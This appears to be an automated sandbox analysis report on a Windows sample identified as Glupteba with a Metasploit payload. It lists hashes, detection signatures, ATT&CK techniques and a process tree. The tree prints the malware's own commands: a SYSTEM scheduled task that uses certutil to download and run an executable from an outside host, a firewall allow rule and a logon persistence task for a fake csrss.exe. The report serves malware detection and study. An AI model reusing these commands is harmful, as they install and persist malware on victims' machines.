Overview

overview

10

Static

static

2368799bc4...8d.exe

windows7_x64

10

2368799bc4...8d.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    139s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-06-2022 01:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe

  • Size

    3.9MB

  • MD5

    d7cdd366a076f32d242bd88450bde311

  • SHA1

    f793c13a8374d1d8dd4cb120b376e39c637b251b

  • SHA256

    2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d

  • SHA512

    778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850

Score
10/10
gluptebametasploitbackdoordiscoverydropperevasionloaderpersistencetrojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe
    "C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2824
    • C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe
      "C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3924
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4616
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4268
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:2872
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:1388
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:848
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3396

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    d7cdd366a076f32d242bd88450bde311

    SHA1

    f793c13a8374d1d8dd4cb120b376e39c637b251b

    SHA256

    2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d

    SHA512

    778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    d7cdd366a076f32d242bd88450bde311

    SHA1

    f793c13a8374d1d8dd4cb120b376e39c637b251b

    SHA256

    2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d

    SHA512

    778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850

    Download Submit
  • memory/848-152-0x0000000000000000-mapping.dmp
    Download
  • memory/1388-150-0x0000000000000000-mapping.dmp
    Download
  • memory/2824-131-0x0000000003280000-0x0000000003A84000-memory.dmp
    Filesize

    8.0MB

    Download
  • memory/2824-132-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/2824-133-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/2824-135-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/2824-130-0x0000000002ECA000-0x0000000003272000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/2872-149-0x0000000000000000-mapping.dmp
    Download
  • memory/3244-138-0x0000000000000000-mapping.dmp
    Download
  • memory/3616-140-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/3616-144-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/3616-137-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/3616-136-0x0000000002CF9000-0x00000000030A1000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/3616-134-0x0000000000000000-mapping.dmp
    Download
  • memory/3924-139-0x0000000000000000-mapping.dmp
    Download
  • memory/4268-148-0x0000000000000000-mapping.dmp
    Download
  • memory/4616-141-0x0000000000000000-mapping.dmp
    Download
  • memory/4616-145-0x0000000003000000-0x00000000033A8000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/4616-146-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download
  • memory/4616-147-0x0000000000400000-0x0000000000F97000-memory.dmp
    Filesize

    11.6MB

    Download